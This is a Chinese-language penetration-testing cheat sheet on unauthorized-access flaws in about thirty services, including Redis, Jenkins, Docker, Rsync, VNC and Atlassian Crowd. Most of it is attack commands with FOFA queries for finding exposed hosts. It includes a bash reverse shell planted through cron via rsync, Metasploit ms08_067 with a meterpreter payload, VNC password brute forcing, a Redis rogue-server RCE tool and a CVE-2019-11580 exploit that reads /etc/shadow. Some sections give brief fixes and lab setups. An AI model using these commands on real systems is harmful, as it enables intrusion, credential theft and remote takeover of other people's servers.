Redis未授权访问漏洞
kali安装Redis:
apt-get install redis
redis使用:
redis-cli -h 192.168.4.176 -p 6379
使用工具可以连接存在未授权的redis
https://github.com/n0b0dyCN/redis-rogue-server
1 python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108
MongoDB未授权访问漏洞
在kali搭建环境:
拉取镜像:
docker pull mongo
启动容器:
docker run -d -p 27017:27017 --name mongodb mongo
查看容器:
docker ps -a
使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问漏洞
nmap -p 27017 --script mongodb-info 127.0.0.1
尝试navicat连接:
Memcached未授权访问漏洞
下载Memcached 并启用环境
memcached.exe -d install
memcached.exe -d start
使⽤Telnet探测⽬标的11211端⼝...
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 39 0 //获得缓存key
get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造
成敏感信息泄露
使⽤Nmap程序的脚本进⾏漏洞扫描....
1 nmap -p 11211 --script memcached-info 192.168.4.199
存在未授权!
Zookeeper未授权访问漏洞
可以使用fofa搜索
port="2181"
在Kali中使⽤以下命令进⾏未授权访问漏洞测试..
echo envi | nc ip 端口
可使⽤Zookeeper可视化管理⼯具进⾏连接...
Jenkins未授权访问漏洞
fofa搜索:
port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"
打开之后->Manage Jenkins->Scritp Console
执行命令:
println "whoami" .execute().text
Jupyter NoteBook未授权访问漏洞
fofa:
"Jupyter Notebook" && port="8888"
vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
还可以新建一个终端:
Elasticsearch未授权访问漏洞
fofa
"Elasticsearch" && port="9200"
存在未授权访问则直接进⼊到信息⻚⾯
漏洞修复:
访问控制策略,限制IP访问,绑定固定IP
在 config/elasticsearch.yml 中为9200端⼝设置认证等
Kibana未授权访问漏洞
fofa
"kibana" && port="5601"
Docker Remote API未授权访问漏洞
fofa
port="2375"
使用浏览器访问路径:
http:ip:2375/version #查看版本信息
http:ip:2375/info #查看容器信息
Kubernetes Api Server未授权访问漏洞
fofa
port="8080" && app="Kubernetes"
直接访问 8080 端⼝会返回可⽤的 API 列表...
漏洞修复:
1.进行授权认证
2.使⽤Service Account令牌
3.配置防火墙策略
Hadoop未授权访问漏洞
fofa:
port="8088" && app="Hadoop"
开启⻚⾯直接访问不经过⽤户密码验证..
漏洞修复:
1.如⽆必要,关闭 Hadoop Web 管理页面
2.开启身份验证,防止未经授权⽤户访问。
3.设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端⼝对公网全部禁⽌或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端⼝。
ActiveMQ未授权访问漏洞
fofa:
body="ActiveMQ" && port="8161"
ActiveMQ默认使⽤8161端⼝,默认⽤户名和密码是 admin/admin
漏洞修复:
1.ActiveMQ的安全配置分为控制台安全配置和后台安全配置。控制台安全配置是指⽤户通过浏览器登 录ActiveMQ管理界⾯,对ActiveMQ进⾏管理的⼀个安全配置;主要是添加⽤户和密码。后台安全 配置是指程序通过ActiveMQ发送消息的⼀个安全配置
2.ActiveMQ后台安全配置。配置置连接ActiveMQ的⽤户名和密码,如果不设置ActiveMQ安全机制, 任何知道ActiveMQ服务的IP、端⼝和消息地址的⼈,都可以接受和发送消息
RabbitMQ未授权访问漏洞
fofa:
port="15672"
port="15692"
port="25672"
在打开的⻚⾯中可输⼊默认的账号密码 guest
漏洞修复:
1.修改为强密码,删除默认账号guest
2.禁止对外开放,设置为仅自己访问
Springboot Actuator未授权访问漏洞
fofa:
icon_hash="116323821"
漏洞修复:
1.禁⽤/env接⼝。
2.升级到Springboot actuator 2.0
3.禁止对外开放
FTP未授权访问漏洞(匿名登陆)
可以直接 ftp ip
账号密码都是 Anonymous
匿名登录
漏洞修复:
1.禁止匿名登录
JBoss未授权访问漏洞
fofa:
title="Welcome to JBoss"
Ldap未授权访问漏洞
fofa:
port="389"
使用Ldapadmin⼯具 进行可视化
工具地址:
LDAP Admin download | SourceForge.net
Rsync未授权访问漏洞
fofa搜索:
(port="873") && (is_honeypot=false && is_fraud=false)
Vulhub中开启靶场:
cd vulhub/rsync/common
docker-compose up -d
可使⽤Nmap扫描该端⼝是否开启服务
nmap -p 873 --script rsync-list-modules ipaddress
也可以Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测..:
auxiliary/scanner/rsync/modules_list
使⽤命令进⾏链接并读取⽂件....
对系统中的敏感⽂件下载操作:
rsync rsync://IP:port/src/etc/passwd ⽬标路径
查看文件:
反弹shell...在此可利⽤定时任务cron来反弹获取shell:
查看定时任务:
rsync rsync://192.168.75.128:873/src/etc/crontab
下载定时任务文件:
rsync rsync://192.168.75.128:873/src/etc/crontab .
查看定时任务:
cat crontab
创建一个文件shell
/bin/bash -i >& /dev/tcp/192.168.75.128/4444 0>&1
上传到靶机:
rsync -av shell rsync://192.168.75.128:873/src/etc/cron.hourly
VNC未授权访问漏洞
fofa:
(port="5900") && (is_honeypot=false && is_fraud=false)
VNC未授权检测
msfdb run
use auxiliary/scanner/vnc/vnc_none_auth
show options
set rhosts IP
set threads 100
run
VNC密码爆破
use auxiliary/scanner/vnc/vnc_login
set rhosts
set blank_passwords true
run
加载攻击模块:
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set rhosts 目标IP
set lhost kali的IP
set target 34
exploit
控制机器:
use exploit/multi/handler
set payload windows/vncinject/reverse_tcp
set lhost 自己IP
set rhost 目标IP
exploit
VNC链接验证...
vncviewer IP
Dubbo未授权访问漏洞
fofa:
(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)
使⽤Telnet进⾏链接测试:
telent IP port
NSF共享⽬录未授权访问
fofa:
"nfs"
安装nfs:
apt install nfs-common
查看服务器上的共享目录:
showmount IP
挂载相应共享⽬录到本地
mount -t nfs IP:/grdata /mnt
卸载目录:
umount /mnt
漏洞修复:
1.利用iptables限制端⼝2049和20048端⼝的访问,禁⽌外部访问
2.设置/etc/exports,对访问进⾏控制
Druid未授权访问漏洞
title="Druid Stat Index"
inurl:"druid/index.html" intitle:"Druid Stat Index"
漏洞修复:
1.配置访问账号密码
2.进制对外开放访问
CouchDB未授权访问
fofa:
(port="5984") && (is_honeypot=false && is_fraud=false)
Vulhub靶场:
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d
执⾏未授权访问测试命令:
curl 192.168.75.128:5984
curl 192.168.75.128:5984/_config
Altassian Crowd未授权访问漏洞
环境搭建
准备⼀台linux虚拟机并执⾏以下命令下载搭建 Atlassian-crowd-3.4.3
wget https://product-downloads.atlassian.com/software/crowd/downloads/atlas
sian-crowd-3.4.3.zip
搭建Java环境并查看JDK版本
sudo apt-get install openjdk-8-jdk
查看JDK版本
Java -vesion
解压文件:
unzip atlassian-crowd-3.4.3.zip
移动⽂件atlassian-crowd-3.4.3到/var⽬录下
sudo cp -r atlassian-crowd-3.4.3 /var/
cd /var/atlassian-crowd-3.4.3/crowd-webapp/WEB-INF/classes/
修改配置文件:
sudo vi crowd-init.properties
添加信息:
crowd.home=/var/atlassian-crowd-3.4.3
开启服务:
sudo sh start_crowd.sh
点击Set up Crowd需要申请key,复制Server ID;进⼊以下官⽹并点击New Trial License申请key...
官网:
https://my.atlassian.com/products/index
进去后,填写信息和上⽅复制的Server ID,会⽣成⼀个key,复制key...
下载攻击脚本:
git clone https://github.com/jas502n/CVE-2019-11580
cd CVE-2019-11580/
执⾏攻击命令并验证
python2 CVE-2019-11580.py url
curl url/crowd/plugins/servlet/exp?cmd=cat%20/etc/s
hadow
RTSP未授权访问漏洞
fofa:
(port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"
下载安装VLC media player
打开:
漏洞修复:
1.修改默认口令
2.禁止开放到外网